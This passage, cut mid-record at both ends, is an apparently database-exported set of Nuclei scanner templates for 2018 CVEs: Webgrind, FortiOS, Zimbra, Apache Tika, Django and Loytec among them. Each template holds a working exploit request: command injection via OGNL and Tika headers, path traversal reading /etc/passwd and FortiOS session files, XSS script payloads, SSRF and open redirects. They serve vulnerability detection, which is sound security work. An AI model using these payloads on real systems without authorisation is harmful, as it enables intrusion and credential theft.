Connection: close\n Content-Type: application/x-www-form-urlencoded\n\n name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n\n payloads:\n command:\n - \"cat /etc/passwd\"\n - \"type C:\\\\/Windows\\\\/win.ini\"\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950", "hash": "547c383f21a3be3473d517390f22edd4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803f" }, "name": "CVE-2018-12909.yaml", "content": "id: CVE-2018-12909\n\ninfo:\n name: Webgrind <= 1.5 - Local File Inclusion\n author: DhiyaneshDk\n severity: high\n description: |\n Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI\n remediation: |\n Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md\n - https://github.com/jokkedk/webgrind/issues/112\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12909\n - https://github.com/KayCHENvip/vulnerability-poc\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12909\n cwe-id: CWE-22\n epss-score: 0.00466\n epss-percentile: 0.74979\n cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: webgrind_project\n product: webgrind\n fofa-query: app=\"Webgrind\"\n tags: cve,cve2018,lfi,webgrind,webgrind_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n - 'webgrind'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950", "hash": "0898b75f03270afff7e72bf4e2005f83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308040" }, "name": "CVE-2018-12998.yaml", "content": "id: CVE-2018-12998\n\ninfo:\n name: Zoho manageengine - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability.\n reference:\n - https://github.com/unh3x/just4cve/issues/10\n - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12998\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12998\n cwe-id: CWE-79\n epss-score: 0.96752\n epss-percentile: 0.99646\n cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: firewall_analyzer\n tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ba108c11778581627bbeac85d1539af59abaf822ff9c7740b86c7444e5dace29022100e409b55ce3441b315844356936324f621eec8b39a5ec0b16303eedbc58d9467e:922c64590222798bb761d5b6d8e72950", "hash": "f3b7ce86d0f10ff2ec675b0ba7b129a7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308041" }, "name": "CVE-2018-1335.yaml", "content": "id: CVE-2018-1335\n\ninfo:\n name: Apache Tika <1.1.8- Header Command Injection\n author: pikpikcu\n severity: high\n description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server.\n remediation: Upgrade to Tika 1.18.\n reference:\n - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/\n - https://www.exploit-db.com/exploits/47208\n - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1335\n - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-1335\n epss-score: 0.96734\n epss-percentile: 0.99585\n cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tika\n tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive\n\nhttp:\n - method: PUT\n path:\n - \"{{BaseURL}}/meta\"\n\n body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");\n\n headers:\n X-Tika-OCRTesseractPath: cscript\n X-Tika-OCRLanguage: //E:Jscript\n Expect: 100-continue\n Content-type: image/jp2\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: text/csv\"\n\n - type: word\n part: body\n words:\n - org.apache.tika.parser.DefaultParser\n - org.apache.tika.parser.gdal.GDALParse\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950", "hash": "f665f043ac70dbd71a0a0dfe5e2834d6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308042" }, "name": "CVE-2018-13379.yaml", "content": "id: CVE-2018-13379\n\ninfo:\n name: Fortinet FortiOS - Credentials Disclosure\n author: organiccrap\n severity: critical\n description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).\n impact: |\n An attacker can obtain sensitive information such as usernames and passwords.\n remediation: |\n Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.\n reference:\n - https://fortiguard.com/advisory/FG-IR-18-384\n - https://www.fortiguard.com/psirt/FG-IR-20-233\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-13379\n cwe-id: CWE-22\n epss-score: 0.97305\n epss-percentile: 0.99854\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortios\n shodan-query: http.html:\"/remote/login\" \"xxxxxxxx\"\n tags: cve2018,cve,fortios,lfi,kev,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - '^var fgt_lang ='\n# digest: 4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950", "hash": "6e868aa2dd36948594a80d8886764cc4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308043" }, "name": "CVE-2018-13380.yaml", "content": "id: CVE-2018-13380\n\ninfo:\n name: Fortinet FortiOS - Cross-Site Scripting\n author: shelld3v,AaronChen0\n severity: medium\n description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.\n reference:\n - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html\n - https://fortiguard.com/advisory/FG-IR-18-383\n - https://fortiguard.com/advisory/FG-IR-20-230\n - https://nvd.nist.gov/vuln/detail/CVE-2018-13380\n - https://github.com/merlinepedra25/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-13380\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46406\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortios\n tags: cve,cve2018,fortios,xss,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B\"\n - \"{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: or\n\n - type: word\n part: header\n negative: true\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950", "hash": "e0b4190a0ee46bf93a78828531179ed1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308044" }, "name": "CVE-2018-13980.yaml", "content": "id: CVE-2018-13980\n\ninfo:\n name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion\n author: wisnupramoedya\n severity: medium\n description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin \"filebrowser\" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45016\n - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/\n - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-13980\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.5\n cve-id: CVE-2018-13980\n cwe-id: CWE-22\n epss-score: 0.0018\n epss-percentile: 0.5428\n cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeta-producer\n product: zeta_producer\n tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950", "hash": "5a9d788cb05774cddc52f101c609efb9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308045" }, "name": "CVE-2018-14013.yaml", "content": "id: CVE-2018-14013\n\ninfo:\n name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.\n reference:\n - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n - https://bugzilla.zimbra.com/show_bug.cgi?id=109018\n - https://bugzilla.zimbra.com/show_bug.cgi?id=109017\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14013\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14013\n cwe-id: CWE-79\n epss-score: 0.00755\n epss-percentile: 0.80655\n cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: synacor\n product: zimbra_collaboration_suite\n tags: cve,cve2018,xss,zimbra,synacor\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f46ca25bae61a8c58a2d3c73103864b52d0333002e1c2422e184eef65e1321b022070c5d6a65e7a9734927fdd6fed6fedc1651f044f5268dd3a44c0d7550fb33f82:922c64590222798bb761d5b6d8e72950", "hash": "da3ef89fc46f0ce026207d18abd02c79", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308046" }, "name": "CVE-2018-14064.yaml", "content": "id: CVE-2018-14064\n\ninfo:\n name: VelotiSmart Wifi - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in VelotiSmart Wifi.\n reference:\n - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac\n - https://www.exploit-db.com/exploits/45030\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064\n - https://medium.com/%40s1kr10s/velotismart-0day-ca5056bcdcac\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-14064\n cwe-id: CWE-22\n epss-score: 0.15741\n epss-percentile: 0.95409\n cpe: cpe:2.3:o:velotismart_project:velotismart_wifi_firmware:b-380:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: velotismart_project\n product: velotismart_wifi_firmware\n tags: cve2018,cve,edb,lfi,camera,iot,velotismart_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063bdd1fe9b5c2d2aa2adee684558be85ff6671a613274c6e7a707fb69329681f022100d3107d95cef68cee1d04cac1bedee37ba1d5188c53813eb37ef9251229e9ea99:922c64590222798bb761d5b6d8e72950", "hash": "a0d8382809b64267c9a17c8920aa8dea", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308047" }, "name": "CVE-2018-14474.yaml", "content": "id: CVE-2018-14474\n\ninfo:\n name: Orange Forum 1.4.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability.\n reference:\n - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa\n - https://seclists.org/fulldisclosure/2019/Jan/32\n - https://vuldb.com/?id.122045\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14474\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14474\n cwe-id: CWE-601\n epss-score: 0.00068\n epss-percentile: 0.28116\n cpe: cpe:2.3:a:goodoldweb:orange_forum:1.4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: goodoldweb\n product: orange_forum\n tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'\n - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a00483046022100f2adff2da944fbe9a1b29f662efd016ead45875d2e06992cd9e61e573f5877f4022100d08b0890924b7addb0673fc531f213922f2e4e23760f5dbca533566a40845382:922c64590222798bb761d5b6d8e72950", "hash": "d70583f5f8ba52e930232d6b3425e963", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308048" }, "name": "CVE-2018-14574.yaml", "content": "id: CVE-2018-14574\n\ninfo:\n name: Django - Open Redirect\n author: pikpikcu\n severity: medium\n description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.\n remediation: |\n Upgrade to the latest version of Django or apply the relevant patch provided by the Django project.\n reference:\n - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/\n - https://usn.ubuntu.com/3726-1/\n - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403\n - https://www.debian.org/security/2018/dsa-4264\n - https://access.redhat.com/errata/RHSA-2019:0265\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14574\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14574\n cwe-id: CWE-601\n epss-score: 0.00828\n epss-percentile: 0.80126\n cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: djangoproject\n product: django\n tags: cve,cve2018,django,redirect,djangoproject\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//www.interact.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Location: https://www.interact.sh\"\n - \"Location: http://www.interact.sh\"\n\n - type: status\n status:\n - 301\n# digest: 4b0a004830460221009caa5018de3f67f939a8bcb172921b8986a43ff83a2c7628413233ec2433c2af0221009d8028df2af32e3128aa06fe627e6d4c10fe49894f9539685a34e7f1a00e83ca:922c64590222798bb761d5b6d8e72950", "hash": "1e9d60425a6363b9bede2953f8a3c0b7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308049" }, "name": "CVE-2018-14728.yaml", "content": "id: CVE-2018-14728\n\ninfo:\n name: Responsive filemanager 9.13.1 Server-Side Request Forgery\n author: madrobot\n severity: critical\n description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability.\n reference:\n - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html\n - https://www.exploit-db.com/exploits/45103/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14728\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-14728\n cwe-id: CWE-918\n epss-score: 0.96369\n epss-percentile: 0.99525\n cpe: cpe:2.3:a:tecrail:responsive_filemanager:9.13.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecrail\n product: responsive_filemanager\n tags: cve2018,cve,ssrf,lfi,packetstorm,edb,intrusive,tecrail\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/filemanager/upload.php\"\n\n body: fldr=&url=file:///etc/passwd\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100b505af24e357311546c8a4a494a248180a1e6a98fd1a43f547164d50c8df1a330220773e22a98921c0d651164ccefc4d424b77d72e22da28bcff69a945e1d384777c:922c64590222798bb761d5b6d8e72950", "hash": "67d092a1ffe5d54c8b268854700c0aba", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804a" }, "name": "CVE-2018-14912.yaml", "content": "id: CVE-2018-14912\n\ninfo:\n name: cgit < 1.2.1 - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.\n remediation: |\n Upgrade cgit to version 1.2.1 or later to mitigate the vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2018080034\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14912\n - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html\n - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627\n - https://lists.debian.org/debian-lts-announce/2018/08/msg00005.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-14912\n cwe-id: CWE-22\n epss-score: 0.96539\n epss-percentile: 0.99521\n cpe: cpe:2.3:a:cgit_project:cgit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cgit_project\n product: cgit\n tags: cve,cve2018,cgit,lfi,cgit_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d6532de8059fab7fd78681f2120fb2a87cd3cb86792239d399ddefff43a1c3ac022100fcebf55316c2ace6c35b49754ffeb2a9ebe30f47a7b5437981e19da9b5545f82:922c64590222798bb761d5b6d8e72950", "hash": "b0f98b86e93ce33784e3dacaaf2d29a3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804b" }, "name": "CVE-2018-14916.yaml", "content": "id: CVE-2018-14916\n\ninfo:\n name: Loytec LGATE-902 <6.4.2 - Local File Inclusion\n author: 0x_Akoko\n severity: critical\n description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the device.\n remediation: |\n Upgrade the Loytec LGATE-902 device to version 6.4.2 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14916\n - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://seclists.org/fulldisclosure/2019/Apr/12\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\n cvss-score: 9.1\n cve-id: CVE-2018-14916\n cwe-id: CWE-732\n epss-score: 0.00685\n epss-percentile: 0.79617\n cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: loytec\n product: lgate-902_firmware\n tags: cve2018,cve,loytec,lfi,packetstorm,seclists,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022043b6d593685732c05b518667af8e2a87711364d9dba4b0f64504a93eae54f2d9022100c5bf2364a2dd3724e40859f816ee1840a3245ed1a33f2273abf587916684486e:922c64590222798bb761d5b6d8e72950", "hash": "22777338065eee7bc3a243db5f6d42be", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804c" }, "name": "CVE-2018-14918.yaml", "content": "id: CVE-2018-14918\n\ninfo:\n name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2019/Apr/12\n - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14918\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-14918\n cwe-id: CWE-22\n epss-score: 0.44897\n epss-percentile: 0.97077\n cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: loytec\n product: lgate-902_firmware\n shodan-query: http.html:\"LGATE-902\"\n tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 